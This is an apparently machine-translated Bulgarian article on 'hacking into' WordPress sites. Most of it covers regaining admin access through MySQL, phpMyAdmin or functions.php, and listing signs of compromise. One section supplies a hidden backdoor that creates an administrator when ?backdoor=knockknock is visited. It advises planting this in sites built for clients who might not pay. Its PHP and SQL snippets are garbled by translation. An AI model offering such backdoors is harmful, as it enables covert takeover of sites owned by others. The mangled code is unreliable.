Как да хакнете в уебсайт на WordPress, Пълното ръководство

Как да хакнете в уебсайт на WordPress, пълното ръководство


Ние не одобряваме, не одобряваме и не насърчаваме незаконно или злонамерено поведение! Целта на тази статия е да обясни как да хакнете или да възстановите достъпа до WordPress сайт, който ви принадлежи, или че имате права за редактиране, администриране и достъп. Каквото и да правите, правите го сами. Ние не носим отговорност за вашите действия. Това ръководство служи само за образователни цели.

Описаните методи ще ви помогнат да си възвърнете достъпа до сайта, дори ако вече нямате акаунт, но ще ви е необходима информация за него и те няма да ви помогнат да влезете в произволна инсталация на WordPress.

В това ръководство ще ви покажем:

  • Как да хакнете в уебсайт на WordPress
  • Как да създадете backdoor в WordPress
  • Как да създадете нов потребителски акаунт чрез FTP
  • 10 знака, че вашият WordPress сайт е хакнат

Как да хакнете в уебсайт на WordPress, пълното ръководство

Ситуации, в които можете да си помогнете

Ако сте в някоя от следните ситуации, нашите методи ще ви помогнат да възстановите достъпа:

  • забравихте потребителското име или имейл адреса
  • опцията за нулиране на паролата не работи на хостинг сървъра
  • нулиране на имейл парола не се получават
  • вече нямате достъп до имейл адреса на акаунта
  • знаете потребителското име и паролата, но комбинацията просто не работи

За да използвате описаните по-долу методи, ще трябва само едно от следните:

  • FTP достъп до сървъра или
  • cPanel достъп до сървъра или
  • достъп до базата данни на MySQL и възможност за отдалечена връзка с нея

Метод №1 – MySQL начин

Използвайте този метод, за да промените паролата (или потребителското име, ако е необходимо) на съществуващ потребител или да създадете нов акаунт. Ще ви трябва cPanel достъп или директен MySQL достъп до базата данни на сайта. Нека започнем с промяна на паролата на съществуващ потребител.

Ако използвате cPanel, влезте в системата (cPanel винаги може да бъде достъпен чрез https://yoursite.com:2083 връзка), намерете и отворете phpMyAdmin. Списъкът от бази данни и таблици е отляво. Търсите таблицата, в която завършва _users. Вероятно ще бъде wp_users, но ако имате повече от един WordPress сайт, инсталиран на сървъра, трябва да намерите подходящия.

Дясната таблица ще има потребителя, който искате да редактирате в нея. Следвайте същата процедура, ако се свързвате с MySQL чрез външен клиент като SQLyog. След като намерите таблицата и действителния потребителски запис, е време да промените паролата.

Както вероятно вече сте разбрали, паролата се запазва в user_pass поле, хеширано с помощта на алгоритъма MD5. Отвори онлайн генератор MD5 въведете паролата, която искате да използвате и кликнете върху „Хеш“. Копирайте генерирания низ и заменете оригиналната парола с него. В phpMyAdmin можете да редактирате полето, като щракнете двукратно върху него. Процедурата е подобна при други клиенти на MySQL. Запазете промените и влезте в WordPress с новата си парола.

WP потребителска таблица

Потребителските имена, хешираните пароли и имейлите се съхраняват в wp_users таблица с база данни

Все още по метод №1 – създаване на нов потребител

Създаването на нов потребител е малко по-сложно, но все пак управляемо за по-малко от минута. Създайте нов запис в таблицата на потребителите и попълнете: user_login, user_pass (хеширан, използвайки описаната по-горе функция MD5) и user_email. Всички останали полета могат да останат празни; те нямат значение. Запазете новия запис. След като бъде запазен, MySQL ще му даде уникален идентификационен номер. Това е номерът в полето за идентификация. Запомни го.

Сега отидете на _usermeta таблица. Помня, префиксът на таблицата трябва да е същият като този на потребителите. Например wp_users и wp_usersmeta. Ако префиксът не е същият, вие редактирате грешна таблица (на някаква друга инсталация на WP) и новият акаунт няма да работи. Ще създадем два нови записа. Игнорирайте umeta_id поле и за двамата. Комплект user_id поле до стойността, която току-що запомнихте (новата стойност на ID в таблицата на потребителите). За първия набор рекорди meta_key да се wpct_user_level и meta_value да се 10. За втория meta_key да се wpct_capabilities и meta_value да се : 1: {е: 13: "администратор"; б: 1;}. Запазете и двете. Готово сте – влезте!

Метод №2 – начинът на функции.php

Този подход може да бъде използван или чрез редактиране на функции.php чрез cPanel, или чрез използване на FTP клиент за това. Ако използвате cPanel, намерете File Manager и го отворете. Първо, трябва да намерим папката на активната тема.

Отидете на public_html / wp_content / теми папка. Ако веднага видите темата си и знаете коя е – чудесно. Отворете папката му и започнете да редактирате functions.php. Ако не, отворете сайта, щракнете с десния бутон навсякъде, изберете „Преглед на източника“. След това натиснете Ctrl + F и започнете да пишете /теми/ скоро ще имате подчертан много URL адреси и ще разпознаете името на папката на активната тема.

Намерете го във файловата структура, отворете и започнете редактиране functions.php. Копирайте / поставете следния код в края на файла. Имайте предвид затварянето ?> PHP тагове, ако ги имате. Те трябва да са на последния ред. Затова поставете кода преди тях.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

ако (! потребителско име_съществува ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (масив ('ID' => $ user_id, 'псевдоним' => $ new_user_email));

$ user = нов WP_User ($ user_id);
$ User-> set_role ( "Администратор");
}

Редактирайте само първите два реда от кода, за да отразявате новия си акаунт. Ако вече има потребител в WP с този имейл, няма да бъде създаден нов акаунт, така че се уверете, че е нов. Променете и паролата – не се хаквайте от деца от скрипт. След като запазите файла, просто отворете сайта си, кодът ще се стартира, създаден е нов акаунт с права на администратор и ще можете да влезете с него.

След като го направите, не забравяйте да изтриете кода от functions.php.

Други методи за хакване

Познавайки паролата за FTP, cPanel или MySQL, вие доказвате, че имате законно право на достъп до сървъра и следователно трябва да имате достъп и до инсталацията (ите) на WordPress. Ако нямате нито един от тези акаунти, тогава не се занимавате (хакнете в сайтове на други хора) и това не е хубаво!

Моля, не забравяйте, че получаването на неоторизиран достъп до каквито и да е компютри, сайтове или сървъри е сериозно престъпление и незабавно се разглежда в повечето страни.

Ако се страхувате, че вашият сайт на WordPress може да бъде хакнат, моля, проверете тази страница с безплатен скенер за сигурност на WordPress. Ако нямате време да настроите своя блог, нека да го направим вместо вас.

Как да създадете backdoor в WordPress

Когато входната врата е затворена, може да опитате задната врата. Това може да звучи като злонамерен начин за използване на кода за влизане в сайта, без да имате достъп до него, но всъщност има моменти, когато трябва да контролирате собствения си сайт, ако някой го е откраднал.

Ако създавате уебсайтове за други хора нещо, което правите, рано или късно ще има клиент, който ще откаже да ви плати за вашата работа; клиент, който ще изтрие данните ви за вход и ще поеме контрола над всичко, което сте направили. Понякога ще бъде достатъчно да създадете нов потребител чрез FTP или да нулирате парола. Когато това не е достатъчно, може да искате да хакнете обратно или да създадете заден достъп до страниците на вашия администратор.

Но ако сте решили да скриете малко парче код във вашата WordPress среда, може да си спестите малко достойнство и получи достъп до сайта на WordPress с администраторски права. И оттам започват игрите.

Независимо колко пъти този крадец изтрие информацията ви или възстановява резервно копие на сървър, който вероятно притежава, има шанс той да не знае нищо за задните входове. Ако го направи, той вероятно дори нямаше да се нуждае от вашата помощ при настройването на WordPress, нали?

Създайте заден прозорец:

Добре, достатъчно с беседата; ето код, който ще ви е необходим, за да свършите работата:

  1. Отворете function.php файла
  2. Копиране / поставяне на следния код:
  3. добавяне ('wp_head', 'wploop_backdoor');
    функция wploop_backdoor () {
    Ако ($ _GET ['backdoor'] == 'knockknock') {
    изискват ( "WP-включва / registration.php ');
    If (! Username_exists ('потребителско име')) {
    $ user_id = wp_create_user ('име', 'пропуск');
    $ user = нов WP_User ($ user_id);
    $ User-> set_role ( "Администратор");
    }
    }
    }
    ?>
  4. Запазите промените

Ако оставите кода такъв, какъвто е, всичко, което би трябвало да направите, за да създадете нов администратор в сайта, е посещението http://www.yourdomain.com/?backdoor=knockknock

След като страницата бъде заредена, вашето ново потребителско име е “Име” и парола “Мине”.

Разбира се, можете да промените това в кода по-горе, като промените „име“ и „преминете“ до каквото искате. Можете също да промените връзката към задната врата, като промените „backdoor“ и / или „knockknock“ към всичко, което излезете.

Опитайте функцията – не само че е забавна, но и наистина може да ви помогне някъде в бъдеще, когато предстои да направите уебсайт за човек, на когото не можете да се доверите напълно. Трябва също така да изравните уменията си за WordPress и блогове.

Как да създадете нов потребителски акаунт чрез FTP

Създаването на нови потребителски акаунти в WordPress е много лесно. Като администратор трябва да го направите отворете страницата на администратора на потребителите където можете да създадете нов акаунт за всяка роля на потребителя. Това може да стане за няколко секунди и новосъздаден потребител може незабавно да влезе с дадено потребителско име и парола.

Но какво се случва, ако загубите достъп до вашия администратор на WordPress? Нещата може да станат малко по-сложни, но не се притеснявайте – ние имаме функция за вас, която може да ви спаси живота на администратора.

Независимо дали друг администратор е изтрил вашия акаунт, дали сте изтрили всички потребители от базата данни по погрешка, използвал е неправилно функциониращ плъгин или е бил хакнат, все пак можете да получите обратно контрол. Понякога може да успеете да получите достъп само до вашия FTP сървър, докато HTTP такъв ще бъде извън вашия обсег и ще трябва да създадете нов администратор. Макар че това може да е рядък случай, следната функция ще ви спести.

За да създадете нов акаунт извън административната среда на WordPress, всичко, от което се нуждаете, е FTP достъп до вашия сайт. Като администратор трябва да имате цялата необходима информация, за да влезете в своя сървър и можете бързо да създадете нов акаунт, като създадете нова функция във вашата тема.

Създайте нов потребителски акаунт чрез FTP:

  1. Отворете FTP клиента и се свържете с вашия акаунт
  2. Навигирайте до wp-съдържание / теми
  3. Отворете папката на темата, която използвате
  4. Търсете файла function.php и го редактирайте
  5. Копирайте и поставете следната функция:
  6. функция admin_account () {
    $ user = 'Потребителско име';
    $ pass = 'Парола';
    $ email = '[email protected]';
    if (! потребителско име_exists ($ потребител) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = нов WP_User ($ user_id);
    $ user-> set_role ('администратор');
    }}
    ADD_ACTION ( "първоначален", "admin_account ');
    
  7. Променете потребителско име, парола и имейл на нещо уникално
  8. Запазите промените

Уверете се, че потребителско име, парола и имейл адрес, които сте задали във функцията, са уникални или в противен случай функцията няма да работи правилно. След като запазите промените, сте готови и можете да отидете до вашия панел за вход в WP. Използвайте нова информация, за да влезете отново и след като потвърдите акаунта, можете да изтриете функцията от файла function.php.

Функцията, показана по-горе, създава администраторски акаунт, но можете лесно да го модифицирате, за да създадете акаунт с всяка друга потребителска роля. просто променете ролята на 8тата ред на кода към редактора, автора, сътрудника, абоната или всяка друга потребителска роля, която сте създали.

За съжаление, ако сте загубили своя администраторски акаунт, вие също сте загубили всички публикации, написани под това потребителско име. Ето защо винаги трябва да съхранявате резервно копие, което лесно можете да извлечете. Ако четете това, докато имате своя администраторски акаунт, приемете това като напомняне, за да създадете резервно копие веднага и да запазвате отметка в тази статия само в случай, че в бъдеще трябва да създадете акаунт извън WordPress.

10 знака, че вашият WordPress сайт е хакнат

WordPress е огромна блог платформа. Има милиони потребители и изглежда, че броят бързо нараства всеки ден. Хората дори са склонни да прехвърлят уебсайтовете си, създадени в други системи за управление на съдържанието, в тази система с отворен код по-често, отколкото може да мислите. И макар това да е добро, това означава това хакерите също ще поставят WordPress на място номер едно, когато се опитват да нахлуят в произволни сайтове.

Обикновено, ако се хакнете, веднага ще знаете за това. Вашият сайт ще стане недостъпен; няма да можете да влезете и понякога хакер дори ще остави съобщение на първа страница. Но по-често, отколкото не, може дори да не забележите, че нещо се е променило. В тази част на статията ще ви покажем няколко знака, които могат да ви покажат, че вашият WordPress сайт е хакнат и няколко решения на проблема..

1. Неуспешно влизане

Този знак е доста очевиден. Ако използвате комбинация от потребителско име и парола известно време, без да имате проблеми, може да се усъмните, ако внезапно WordPress не разпознае вашия акаунт. Ако хакер трябва да влезе във вашия сайт, шансовете са, че той бързо ще промени вашите администраторски привилегии.

Може би трябва да промени паролата ви или напълно да изтрие акаунта ви. Преди да започнете да изпадате в паника след първия път, когато WordPress ви съобщава за неправилно потребителско име / парола, моля, помислете за факта, че може да сте въвели грешна комбинация или че може да сте включили бутона за заключване.

Решение: Опитайте да възстановите паролата по имейл или използвайте друг акаунт, за да влезете обратно. За да сте сигурни, че входът ви остава безопасен, препоръчваме да инсталирате Вход Ninja плъгин за WordPress.

2. В сайта ви се добавя злонамерено съдържание

Сайтът съдържа предупреждение за злонамерен софтуер

Ако започнете да забелязвате непознато съдържание на вашия сайт, може да започнете да се притеснявате. Когато получат шанс за достъп до вашата администраторска област, хакерите ще могат да променят вашето ядро, както и вашите теми и файлове с плъгини. Това означава, че те могат да променят всичко, което искат.

Докато някои хакери ще променят драстично външния вид на вашия сайт и може би дори ще посочат, че сте хакнали, другите ще бъдат много по-фини за него.

Решение: Опитайте да потърсите скрито съдържание в кода на уебсайта. Възможно е да има връзки към злонамерени хакери на сайтове, засадени в долния колонтитул на вашия сайт, или може да имат инсталирани изскачащи прозорци, които ще се отварят редовно за вашите клиенти. Използвайте Security Ninja, за да сканирате вашия сайт или непрекъснато да наблюдавате вашия сайт за подобни проблеми.

3. Подозрителни посещения

Ако не проследявате уебсайта си, трябва да започнете да го правите незабавно. Един прост начин е да използвате Google Analytics, който наред с много други функции може да ви каже колко посещения получавате и откъде идват тези посещения. След известно време ще опознаете вашия уебсайт. Това означава, че ще знаете откъде идват посещенията, ще знаете кога стартирате нова кампания и кога има нови промоционални връзки, пуснати в природата.

Но ако изведнъж забележите, че вашият сайт получава огромен брой нови посещения от подозрителния домейн, ще искате да проучите това по-нататък, защото вашият сайт може просто да бъде хакнат. Обикновено този вид посещения ще доведе до 100% степен на отпадане, което означава, че е била достъпна само една страница. Хакерите често използват автоматизирани системи, които ще доведат други лоши сайтове към вашите. Независимо дали става въпрос за лошия код, който се изпълнява на вашия сайт или сте станали част от спам мрежа, нещата могат да станат сериозни и ще трябва да проверите вашия сайт за злонамерен код.

Решение: употреба Google Инструменти за уеб администратори за да намерите подозрителни домейни

4. Внезапен спад в трафика

Безопасно сърфиране Състояние на сайта

За разлика от последния споменат знак за хакване, този може да ви предупреди, защото внезапно намалява броят на посещенията. Вместо да ви насочва нови посещения, хакер може да изпраща посещения далеч от вашия сайт. Това може да се случи, защото хакер пренасочи вашия сайт към друг. Другата причина за получаване на по-малко посетители е, че Google постави в черен списък вашия сайт. Това действие ще покаже съобщение до всеки потребител, който може да избере да не отваря вашия сайт, защото е заразен.

Решение: Използвайте Google Състояние на безопасното сърфиране на сайта за да проверите дали вашият сайт е маркиран като опасен и понастоящем е опасен за посещение.

5. Резултатите от търсачките са странни

Ако не сте забелязали промени в сайта си, но разберете, че резултатите от търсенето в Google и други търсачки са странни (покажете различни заглавия и други метаданни), това може да е ясен знак за хакнат сайт. Хакер може да е променил съдържанието ви по начин, който да бъде видим само за експерт. Все пак промяната ще бъде видима в резултатите от търсачката.

Решение: Проверете вашия сайт с Google Инструменти за уеб администратори, и проверете дали вашият сайт е хакнат с това безплатен онлайн инструмент.

6. Не можете да изпращате / получавате имейли

След като хакер получи достъп до вашия сайт, той вероятно ще иска използвайте вашия сървър за спам всички останали. Когато разберете, че не можете да изпращате или получавате нови имейли от вашата WordPress, това може да е ясен знак, че сте се хакнали. Проверете още веднъж имейла си, след това го проверете при вашия доставчик, за да се уверите, че няма грешки.

Решение: Тествайте WordPress функция за поща с този безплатен плъгин.

7. Сайт не съществува

Сървърът не е намерен

Има моменти, когато хакерите няма да имат достъп до вашия сайт, за да засаждат злонамерен код, да пренасочват потребители или да използват имейла си за спам. Понякога, всичко, което те искат да направят, е да сринат вашия сайт. Рядко хакер успешно ще изтрие всичко от целия сървър. Ето защо е важно да хоствате вашите файлове в известна хостинг компания, която ще се грижи за сигурността и също така да поддържате ежедневни или поне седмични архиви на вашия уебсайт. Добра практика е също така да правите свои резервни копия от време на време, така че сайтът да може бързо да бъде възстановен.

Решение: Инсталирайте един от най-добрите приставки за управление на архивирането в WordPress.

8. Подозрителни файлове

Подобно на злонамерено съдържание, което може да бъде добавено към съществуващи файлове, хакер може да засади допълнителни файлове навсякъде в кореновата ви папка. Добре е да знаете как да заобиколите WordPress, но ако не сте толкова опитни, трябва да имате на разположение инструмент за сигурност, който да проверява всичките ви файлове и дейности. Наскоро прегледахме Security Ninja, който е перфектен инструмент за проверка на всичките ви WordPress файлове.

Решение: Опитайте да търсите файлове, които не принадлежат към вашата инсталация на WordPress. Използвайте Ninja за сигурност, за да сканирате вашия сайт редовно и автоматично да намерите тези файлове. След това изтрийте файловете или премахнете злонамерения код от заразените файлове. Не забравяйте добавката Core Scanner за Security Ninja.

9. Нови членове

В зависимост от вашия сайт, може да сте единственият, който може да добави нови членове. В такъв случай имейл, в който се разказва за ново регистрирани потребители, може да задейства аларма. Ако има други администратори, които имат възможност да добавят нови членове, проверете с тях за подозрителна активност.

Решение: Променете URL адреса за вход с безплатен плъгин, ограничете достъпа до вашата страница за вход в WordPress, като използвате .htpasswd файл и използвайте Login Ninja, за да защитите вашата форма за вход през цялото време.

10. Проверете планираните събития на вашия сървър

Понякога хакер няма да направи нещо на вашия уебсайт, след като намери път. Вместо това, те ще напуснат насрочени събития което може да навреди на сайта Ви някъде в бъдеще. Тази техника е опасна, тъй като хакер може да остави неопитна жертва в началото без значение. Може да сте заразени и да не знаете нищо за това.

Решение: Проверете вашите CRON задания на сървър, който използвате и се уверете, че няма подозрителни планирани задачи.

Обобщавайки

Надяваме се, че тази статия ще ви помогне да управлявате дори по-безопасен WordPress сайт и че ще ви помогне да възстановите достъпа до него в лоши ситуации. И дори ако сайтът ви е чист, не го приемайте за даденост.
Винаги се уверете, че вашият блог е толкова безопасен, колкото може да бъде. Предлагаме приставки за сигурност за WordPress, които могат да ви спестят най-много време. И все пак не бъдете този, който използва опасна парола и бъдете внимателни, когато хаквате в собствения си WordPress сайт.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Liked Liked